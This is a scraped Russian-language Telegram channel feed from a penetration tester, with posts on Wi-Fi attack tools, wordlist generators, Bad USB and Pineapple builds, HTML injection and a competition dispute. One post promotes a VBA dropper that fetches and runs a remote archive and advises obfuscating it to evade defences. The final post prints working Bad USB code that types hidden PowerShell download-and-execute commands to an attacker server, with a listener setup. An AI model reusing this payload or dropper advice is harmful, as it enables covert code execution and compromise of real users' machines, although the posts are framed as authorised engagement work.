Мне, кстати, приехала куча ништяков 😋 Где-то там еще лежит кучка пико с флешками! Дописываю статью -> покупаю паяльник с тонким жалом -> и..? Ну хекаю типа 😎
TRY FCK HARDER❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7❤🔥2🔥1
Ну и небольшой вкид по статье…) Конечно не как это делает Магама, но не осветить легендарную Button Injection я не могу 🤡
ТРАЙ ФАК ХАРДЕР ❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3❤2
WiFi Pohek 😎
Wireless Hardware Sec DB:
https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y
Toolkit:
https://github.com/s0lst1c3/eaphammer
https://github.com/v1s1t0r1sh3r3/airgeddon
https://github.com/t6x/reaver-wps-fork-t6x
https://github.com/aanarchyy/bully
https://github.com/derv82/wifite2
https://github.com/s0i37/karma
TRY FCK HARDER🔫
Wireless Hardware Sec DB:
https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y
Toolkit:
https://github.com/s0lst1c3/eaphammer
https://github.com/v1s1t0r1sh3r3/airgeddon
https://github.com/t6x/reaver-wps-fork-t6x
https://github.com/aanarchyy/bully
https://github.com/derv82/wifite2
https://github.com/s0i37/karma
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5❤1😁1
Когда на проекте одна звездочка, твоя… 😢 😭 😵
Сделал модификацию для CUPP, называется bettercupp. В целом, готовая и работает, осталось только затестить на наличие багов и прикрутить пару фитч. Думаю, завтра уже можно будет постить сюда🥰
TRY FCK HARDER 😉
Сделал модификацию для CUPP, называется bettercupp. В целом, готовая и работает, осталось только затестить на наличие багов и прикрутить пару фитч. Думаю, завтра уже можно будет постить сюда
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6
Гайз, поздравляю всех с Новым, 2024 годом!
В этом году канал успел вырасти с 0 до 55 подписчиков! Всем благодарен за то, что читаете всю эту заумную (и не очень) муть. Считаю, что это неплохой результат, учитывая отсутствие ботов)
В новом году желаю вам, чтобы вы, независимо от рода деятельности, достигали самых высоких вершин в том, чем вы горите🔥
Лично я горю этим самым пенетрайшн тестом😋 Именно поэтому в 2024 году я буду невероятно рад кормить своих дорогих подпещеков своим экспертным контентом 🤔
Админ уже нажрался, а обещанный скрипт будет уже в 2024 году, увидимся!!!🥰
В этом году канал успел вырасти с 0 до 55 подписчиков! Всем благодарен за то, что читаете всю эту заумную (и не очень) муть. Считаю, что это неплохой результат, учитывая отсутствие ботов)
В новом году желаю вам, чтобы вы, независимо от рода деятельности, достигали самых высоких вершин в том, чем вы горите
Лично я горю этим самым пенетрайшн тестом
Админ уже нажрался, а обещанный скрипт будет уже в 2024 году, увидимся!!!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤15🔥4❤🔥3
bettercupp 🥶
Встречайте, мое скромное виденье на узко известный в широких кругах инструмент CUPP(Common User Password Profiler)🥹
https://github.com/E1tex/bettercupp
Почему он better чем оригинал:
1. Добавил Non-Interactive Mode.
Всего один пункт, но даже так он уже покрывает определенный пласт боевых задач, с чем не справлялся оригинал😋
Пример использования:
profiletest.txt:
На выходе получаем уникальный для каждого пользователя словарь с паролями, сгенерированными на основе данных, которые мы указали в файле😎
TRY FCK HARDER 🎈
Встречайте, мое скромное виденье на узко известный в широких кругах инструмент CUPP(Common User Password Profiler)
https://github.com/E1tex/bettercupp
Почему он better чем оригинал:
1. Добавил Non-Interactive Mode.
Всего один пункт, но даже так он уже покрывает определенный пласт боевых задач, с чем не справлялся оригинал
Пример использования:
python3 ./bettercupp.py -ni -ofn pets_name -pf profiletest.txt -n 0 -fn 1 -ln 2
profiletest.txt:
nick1:Ivan:Spiridonov
nick2:Vasya:Pupkin
...
nickname:Name:Surname
На выходе получаем уникальный для каждого пользователя словарь с паролями, сгенерированными на основе данных, которые мы указали в файле
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - E1tex/bettercupp
Contribute to E1tex/bettercupp development by creating an account on GitHub.
🔥10😎4⚡3
CVE-2023-48104😳
Да, CVSS скор не 10, но камон, это как первая любовь.. Какой бы страшненькой и кринжовой она не была, вспоминаешь о ней с теплом!❤️
https://nvd.nist.gov/vuln/detail/CVE-2023-48104
https://ubuntu.com/security/CVE-2023-48104
TRY FCK HARDER
Да, CVSS скор не 10, но камон, это как первая любовь.. Какой бы страшненькой и кринжовой она не была, вспоминаешь о ней с теплом!
https://nvd.nist.gov/vuln/detail/CVE-2023-48104
https://ubuntu.com/security/CVE-2023-48104
Please open Telegram to view this post
VIEW IN TELEGRAM
🎉13🔥4❤1👍1
Teensy 2.0 Bad USB 😱
https://teletype.in/@e1tex/teensybadusb
В данной статье мы рассмотрим процесс создания устройства Bad USB с использованием платы на базе Arduino - Teensy 2.0.
Я продемонстрирую шаги по созданию и программированию этого маленького, но мощного устройства, способного провести атаку на компьютерную систему, обойти защитные механизмы и получить несанкционированный доступ к данным.
TRY FCK HARDER 💪
https://teletype.in/@e1tex/teensybadusb
В данной статье мы рассмотрим процесс создания устройства Bad USB с использованием платы на базе Arduino - Teensy 2.0.
Я продемонстрирую шаги по созданию и программированию этого маленького, но мощного устройства, способного провести атаку на компьютерную систему, обойти защитные механизмы и получить несанкционированный доступ к данным.
Please open Telegram to view this post
VIEW IN TELEGRAM
Teletype
Teensy 2.0 Bad USB
В данной статье мы рассмотрим процесс создания устройства Bad USB с использованием платы на базе Arduino - Teensy 2.0.
❤🔥8❤3👍2🔥2
CUNP(Common UserName Profiler) 🕷
Туловина для генерации списка имен пользователей.
Писалась чисто под задачки, которые встречаются в работе повсеместно.
Из прикольных фитч — тонкая настройка входящих данных: от количества пользователей, до шаблонов, по которым надо генерить список😎
https://github.com/E1tex/CUNP
Enjoy!
TRY FCK HARDER 😈
Туловина для генерации списка имен пользователей.
Писалась чисто под задачки, которые встречаются в работе повсеместно.
Из прикольных фитч — тонкая настройка входящих данных: от количества пользователей, до шаблонов, по которым надо генерить список
https://github.com/E1tex/CUNP
Enjoy!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥8👍5😈5❤1👏1
Awesome-InfoSec-TG-channels 🤨
https://github.com/k0yt/Awesome-InfoSec-TG-channels
Интересный проект по парсингу ТГ каналов по теме киберсесурити. Там можно поискать всякие интересности или, например, подыскать коллег по цеху с целью взаимного продвижения каналов ))
Даже свое детище там нашел, между прочим, на 225 месте😇
Правда без тега pentest lul >_<
TRY FCK HARDER 💀
https://github.com/k0yt/Awesome-InfoSec-TG-channels
Интересный проект по парсингу ТГ каналов по теме киберсесурити. Там можно поискать всякие интересности или, например, подыскать коллег по цеху с целью взаимного продвижения каналов ))
Даже свое детище там нашел, между прочим, на 225 месте
Правда без тега pentest lul >_<
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11🤷♂2👨💻1🤗1
Pineapple with Eyes 👁 👁
https://teletype.in/@e1tex/pineapplewitheyes
В данной статье мы рассмотрим сборку аппаратной закладки, которая не будет требовать прямого доступа к атакуемым системам - Wi-Fi Pineapple. Кроме того, мы изучим, как это устройство может быть задействовано не только при атаках на Wi-Fi сети, но и в качестве IP-камеры для наблюдения за объектами.
TRY FCK HARDER 👁
https://teletype.in/@e1tex/pineapplewitheyes
В данной статье мы рассмотрим сборку аппаратной закладки, которая не будет требовать прямого доступа к атакуемым системам - Wi-Fi Pineapple. Кроме того, мы изучим, как это устройство может быть задействовано не только при атаках на Wi-Fi сети, но и в качестве IP-камеры для наблюдения за объектами.
Please open Telegram to view this post
VIEW IN TELEGRAM
Teletype
Pineapple with Eyes
В данной статье мы рассмотрим сборку аппаратной закладки, которая не будет требовать прямого доступа к атакуемым системам - Wi-Fi...
🔥14👍5❤🔥2❤2
Друзья, какой направленности доклад на PHD вам было бы интересно от меня услышать?🔜
Anonymous Poll
37%
⚫️Вебчик
46%
⚫️Физика/Хардварь
44%
⚫️Редтимчик/Байпасы АВшек и пр.
👍11💩5
non-typical PeneTration 🎹
https://teletype.in/@r00t_owl/hXHHVdpGeyY
Недавно принял участие в оч интересном проекте по физике, нам даже удалось отснять некоторые ключевые моменты, edit по которым мы уже закинули на ютаб, приятного просмотра:
https://www.youtube.com/watch?v=1N5WyC1qwtI
TRY FCK HARDER ☠️
https://teletype.in/@r00t_owl/hXHHVdpGeyY
Недавно принял участие в оч интересном проекте по физике, нам даже удалось отснять некоторые ключевые моменты, edit по которым мы уже закинули на ютаб, приятного просмотра:
https://www.youtube.com/watch?v=1N5WyC1qwtI
Please open Telegram to view this post
VIEW IN TELEGRAM
Teletype
non-typical PeneTration
Всем Привет! Недавно закончился интересный проект, где задачей было физически проникнуть в компанию и выполнить ряд атак на сетевую...
❤11🏆3👾1
Красавица и HTML Injection. Почему HTMLi не только про дефейс 🚨
https://habr.com/ru/articles/804863/
Таки встретил свет мой лонгрид по HTML-инъекциям! Начинающие специалисты, набирайтесь терпения! А для продвинутых хакеров я сделал удобное оглавление, которым вы можете воспользоваться для изучения конкретно интересующей вас темы!
Приятного прочтения!
TRY FCK HARDER 🤩
https://habr.com/ru/articles/804863/
Таки встретил свет мой лонгрид по HTML-инъекциям! Начинающие специалисты, набирайтесь терпения! А для продвинутых хакеров я сделал удобное оглавление, которым вы можете воспользоваться для изучения конкретно интересующей вас темы!
Приятного прочтения!
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Красавица и HTML Injection. Почему HTMLi не только про дефейс
Привет, Хабр. Сегодня мы посмотрим на достаточно тривиальную тему с совсем нетривиальной стороны. Пожалуй, для каждого вебера HTML-инъекции являются темой, которой зачастую уделяют не очень много...
🔥13🍾4👍3💯2🏆2
VBA_Dropper 👀
Написал небольшой дроппер на VBA, который качает с сервера архив, распаковывает его в диру с рандомным названием, закидывает туда содержимое и запускает. Пользуйте, Друзья!
Только перед этим не забудьте чутка подобфусцировать его, чтобы точно дошел до адресата)
https://github.com/E1tex/VBA_Dropper.git
*Можете подредачить его, чтобы он, например, сразу распаковывал файл в Startup диру(?)👍 *
TRY FCK HARDER 🔥
Написал небольшой дроппер на VBA, который качает с сервера архив, распаковывает его в диру с рандомным названием, закидывает туда содержимое и запускает. Пользуйте, Друзья!
Только перед этим не забудьте чутка подобфусцировать его, чтобы точно дошел до адресата)
https://github.com/E1tex/VBA_Dropper.git
*Можете подредачить его, чтобы он, например, сразу распаковывал файл в Startup диру(?)
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - E1tex/VBA_Dropper: This VBA-dropper facilitates the automation of downloading a ZIP archive from a server, extracting…
This VBA-dropper facilitates the automation of downloading a ZIP archive from a server, extracting its contents into a temporary folder, and executing the extracted executable file. Specifically ta...
❤8🔥6😁1
Лучший евент от лучших организаторов 🤡
Нереально на самом деле обидно за каждую команду из государства S, а, в частности, за четверку лучших его команд.
Помимо упомянутого в посте ниже, в программу лучшего евента от лучших оргов вошли:
1. Постоянные проблемы с брутом, неоднократно забывали закидывать необходимые креды в словари.
2. Дохлые хосты, как внутри лабораторной инфры, так и платформа для сдачи отчетов.
3. Баги, которые мешают сдать отчет.
4. Неожиданные сливы оргами инфы всем командам, на поиск которой, некоторые команды тратили драгоценное время.
5. Ну и, конечно, слухи о том, что некоторым командам непосредственно орги хинтили и сливали решение по таскам🤡 А немного проанализировав, можно понять, что эти слухи не такие уж и безосновательные!)()9)0)
TRY FCK HARDER ☠️
Not Pay harder(((
Нереально на самом деле обидно за каждую команду из государства S, а, в частности, за четверку лучших его команд.
Помимо упомянутого в посте ниже, в программу лучшего евента от лучших оргов вошли:
1. Постоянные проблемы с брутом, неоднократно забывали закидывать необходимые креды в словари.
2. Дохлые хосты, как внутри лабораторной инфры, так и платформа для сдачи отчетов.
3. Баги, которые мешают сдать отчет.
4. Неожиданные сливы оргами инфы всем командам, на поиск которой, некоторые команды тратили драгоценное время.
5. Ну и, конечно, слухи о том, что некоторым командам непосредственно орги хинтили и сливали решение по таскам
Not Pay harder(((
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯14👎4👍2❤1
Forwarded from Ivan Bulavin
Друзья, сообщество Standoff.
Благодарим всех, кто играл сегодня с нами. Конечно же мы благодарим наших союзников, отличных ребят, экспертов своего дела, а также благодарим наших соперников, с которыми создали по-настоящему накаленную атмосферу.
Обращаемся к вам, чтобы обрамить наши последующие действия в понятный и доходчивый посыл: Мы не хотим дискредитировать вашу хорошую игру, но не согласны с тем, что организаторы обеспечили честную игру для каждой команды.
На этом мероприятии мы и вы наблюдали, следующие факты, не позволяющие признавать происходящее настоящим сравнением сил сторон.
1. Те риски, что не смогла реализовать Государство S были неподготовлены к игре и нерешабельны, другая часть рисков так и не была доступна для решения в ходе игры из-за ошибок в системах скада и работе сети.
2. Нашим соперникам досталось 3 сегмента сети для атак, которые весь год находились на полигоне 365, а заверения организаторов о том, что они обновили инфраструктуру и задачи не оказались правдой.
3. Организаторы знали, что команда Pr1me, которая с самого начала отказалась играть, и даже на этапе подготовки сообщила об этом, была включена в общий зачет. А в последствии принесла победное значение коэффициента команде государства F своим "внезапным" отсутствием.
Как утверждалось в презентации мероприятия: "Победит самое сплоченное государство". Определенно государство S вышло победителем в этой схватке, как самое сплоченное, сыгранное и объединившееся. Мы благодарим за игру наших соратников, мы также благодарим за игру наших соперников.
В сложившейся ситуации мы вынуждены принять решение об отказе от участия в дальнейших активностях мероприятия Standoff 13.
True0xA3 (ТруОАЗ)
Благодарим всех, кто играл сегодня с нами. Конечно же мы благодарим наших союзников, отличных ребят, экспертов своего дела, а также благодарим наших соперников, с которыми создали по-настоящему накаленную атмосферу.
Обращаемся к вам, чтобы обрамить наши последующие действия в понятный и доходчивый посыл: Мы не хотим дискредитировать вашу хорошую игру, но не согласны с тем, что организаторы обеспечили честную игру для каждой команды.
На этом мероприятии мы и вы наблюдали, следующие факты, не позволяющие признавать происходящее настоящим сравнением сил сторон.
1. Те риски, что не смогла реализовать Государство S были неподготовлены к игре и нерешабельны, другая часть рисков так и не была доступна для решения в ходе игры из-за ошибок в системах скада и работе сети.
2. Нашим соперникам досталось 3 сегмента сети для атак, которые весь год находились на полигоне 365, а заверения организаторов о том, что они обновили инфраструктуру и задачи не оказались правдой.
3. Организаторы знали, что команда Pr1me, которая с самого начала отказалась играть, и даже на этапе подготовки сообщила об этом, была включена в общий зачет. А в последствии принесла победное значение коэффициента команде государства F своим "внезапным" отсутствием.
Как утверждалось в презентации мероприятия: "Победит самое сплоченное государство". Определенно государство S вышло победителем в этой схватке, как самое сплоченное, сыгранное и объединившееся. Мы благодарим за игру наших соратников, мы также благодарим за игру наших соперников.
В сложившейся ситуации мы вынуждены принять решение об отказе от участия в дальнейших активностях мероприятия Standoff 13.
True0xA3 (ТруОАЗ)
BadUSB Check-Script 😈
Если во время выполнения работы по социальной инженерии — будь то через флешки или физику, — нам не требуется делать пробив, мы можем просто отправить запрос на подконтрольный сервер и залогировать входящие запросы.
Поскольку заказчику необходимо знать, кому проводить обучение после завершения кампании😐 , нам нужно собрать минимальную информацию о хосте, с которого был отправлен запрос. В скрипте ниже, используя переменные окружения, мы отправляем с виндовой тачки запрос, содержащий hostname и username.
Помимо сбора информации, такой подход помогает не потерять запросы, которые мы можем пропустить из-за надоедливых сканов со стороны Shodan, Censys и пр.
Скрипт, который я написал и активно использую, работает с модулем Paensy, разбор которого был ранее на канале:
А для того, чтобы отлавливать запросы, мы можем использовать простой Python HTTP Server:
Здесь мы:
1. Отключаем буферизацию вывода;
2. Перенаправляем как stderr, так и stdout в лог-файл;
3. Записываем pid в файл, чтоб не потерять его и спокойно убить процесс, в случае необходимости.
По основному скрипту:
1. Основной скрипт для Arduino меняет язык раскладки, используя всего два сочетания клавиш, что можно изменить по вашему усмотрению;
2. Если цель еще не на рабочем месте, можно вставить плату и забыть о ней— скрипт выполняется каждые полчаса в бесконечном цикле;
3. Нажатие же клавиш типа ESC,ENTER и BACKSPACE нужно для того, чтобы, если компьютер заблокирован, у таргета стирались те данные, которые были введены в процессе выполнения скрипта.
не палимся)
TRY FCK HARDER 🕺
Если во время выполнения работы по социальной инженерии — будь то через флешки или физику, — нам не требуется делать пробив, мы можем просто отправить запрос на подконтрольный сервер и залогировать входящие запросы.
Поскольку заказчику необходимо знать, кому проводить обучение после завершения кампании
Помимо сбора информации, такой подход помогает не потерять запросы, которые мы можем пропустить из-за надоедливых сканов со стороны Shodan, Censys и пр.
Скрипт, который я написал и активно использую, работает с модулем Paensy, разбор которого был ранее на канале:
#include <paensy.h>
void setup() {
delay(5000);
SetDelay(100);
while (true) {
delay(5000);
RunCommand("powershell -windowstyle hidden IEX (New-Object System.Net.WebClient).DownloadString('http://IP:PORT/%computername%/%username%')");
PressKey(KEY_ENTER, 1);
PressKey(KEY_ESC, 1);
Keyboard.press(KEY_LEFT_SHIFT);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.releaseAll();
delay(500);
RunCommand("powershell -windowstyle hidden IEX (New-Object System.Net.WebClient).DownloadString('http://IP:PORT/%computername%/%username%')");
PressKey(KEY_ENTER, 1);
PressKey(KEY_ESC, 1);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press(KEY_SPACE);
Keyboard.releaseAll();
delay(500);
RunCommand("powershell -windowstyle hidden IEX (New-Object System.Net.WebClient).DownloadString('http://IP:PORT/%computername%/%username%')");
PressKey(KEY_ENTER, 1);
PressKey(KEY_ESC, 1);
PressKey(KEY_BACKSPACE, 1);
delay(1800000);
}
}
void loop() {
}
А для того, чтобы отлавливать запросы, мы можем использовать простой Python HTTP Server:
sudo PYTHONUNBUFFERED=x python3 -m http.server PORT &> ../http.server.log & echo $! > ../http.server.pid
Здесь мы:
1. Отключаем буферизацию вывода;
2. Перенаправляем как stderr, так и stdout в лог-файл;
3. Записываем pid в файл, чтоб не потерять его и спокойно убить процесс, в случае необходимости.
По основному скрипту:
1. Основной скрипт для Arduino меняет язык раскладки, используя всего два сочетания клавиш, что можно изменить по вашему усмотрению;
2. Если цель еще не на рабочем месте, можно вставить плату и забыть о ней— скрипт выполняется каждые полчаса в бесконечном цикле;
3. Нажатие же клавиш типа ESC,ENTER и BACKSPACE нужно для того, чтобы, если компьютер заблокирован, у таргета стирались те данные, которые были введены в процессе выполнения скрипта.
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
FCK HARDER
Teensy 2.0 Bad USB 😱
https://teletype.in/@e1tex/teensybadusb
В данной статье мы рассмотрим процесс создания устройства Bad USB с использованием платы на базе Arduino - Teensy 2.0.
Я продемонстрирую шаги по созданию и программированию этого маленького,…
https://teletype.in/@e1tex/teensybadusb
В данной статье мы рассмотрим процесс создания устройства Bad USB с использованием платы на базе Arduino - Teensy 2.0.
Я продемонстрирую шаги по созданию и программированию этого маленького,…
👍11🔥8❤2